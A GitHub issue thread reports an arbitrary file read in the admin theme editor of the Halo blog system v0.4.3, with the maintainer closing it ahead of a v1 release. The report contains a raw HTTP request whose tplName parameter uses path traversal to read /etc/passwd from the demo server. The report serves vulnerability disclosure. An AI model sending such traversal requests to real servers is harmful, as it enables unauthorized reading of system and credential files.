### ISSUE TITLE
A Arbitrary File reading in the backend

### ISSUE THREAD

**Issue by Byc4i** [halo-dev/halo#132]
**我确定我已经查看了** (标注`[ ]`为`[x]`)

- [x] [Halo 使用文档](https://docs.halo.run/)
- [x] [Github Wiki 常见问题](https://github.com/ruibaby/halo/wiki/4.-%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98)
- [x] [其他 Issues](https://github.com/ruibaby/halo/issues)

----

**我要申请**  (标注`[ ]`为`[x]`)

- [x] BUG 反馈 (security)

---

There is a Arbitrary file reading in the backend was discovered in halo release v0.4.3

There is a Arbitrary file reading vulnerability  exists in the themes/editor page.
Vulnerability url: `https://demo.halo.run/admin/themes/editor`

eg.

```
GET /admin/themes/getTpl?tplName=../../../../../../../../etc/passwd HTTP/1.1
Host: demo.halo.run
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://demo.halo.run/admin/themes/editor
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: JSESSIONID=7pY4KPxPbsy7pPOuJ_5OghgiMpv14yT9XbfW_p20
```
![image](https://user-images.githubusercontent.com/18072317/55538173-664d6a00-56f0-11e9-83f7-40c392a6a417.png)

**Comment by ruibaby** [comment]
准备发布 v1，所以关闭该 issue。
